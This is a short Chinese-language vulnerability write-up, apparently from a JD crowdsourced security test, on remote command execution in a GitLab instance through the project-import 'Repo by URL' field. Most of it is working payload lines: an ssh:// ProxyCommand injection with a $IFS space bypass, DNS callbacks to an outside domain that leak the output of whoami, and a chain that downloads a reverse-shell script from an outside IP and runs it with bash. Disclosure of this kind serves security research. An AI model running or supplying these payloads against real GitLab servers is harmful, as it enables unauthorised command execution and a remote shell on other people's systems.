jd众测gitlab远程命令执行
http://monitor-fb.jd.com/users/sign_in 首先注册一个账号ahtest
然后创建一个项目,创建方式选择Repo by URL
这里由于gitlab本身的漏洞可以使用ssh://,这里可以绕过执行命令
poc: ssh://-oProxyCommand=要执行的命令/a
注意这里不能出现空格还有部分特殊字符,下面为fuzz最终绕过poc
ssh://-oProxyCommand=ping$IFS’jd.1.rs12.ga’/a
查看我的dnslog,成功收到dns解析请求日志
成功执行命令
查看是否为root的poc:ssh://-oProxyCommand=wget$IFS$9$(whoami).1.rs12.ga/a
讲远程站点的index.html内容换成wget下载反弹shell的脚本
ssh://-oProxyCommand=wget$IFS$945.78.54.37$IFS-O1.sh/a
ssh://-oProxyCommand=bash$IFS’1.sh’/a 反弹回shell
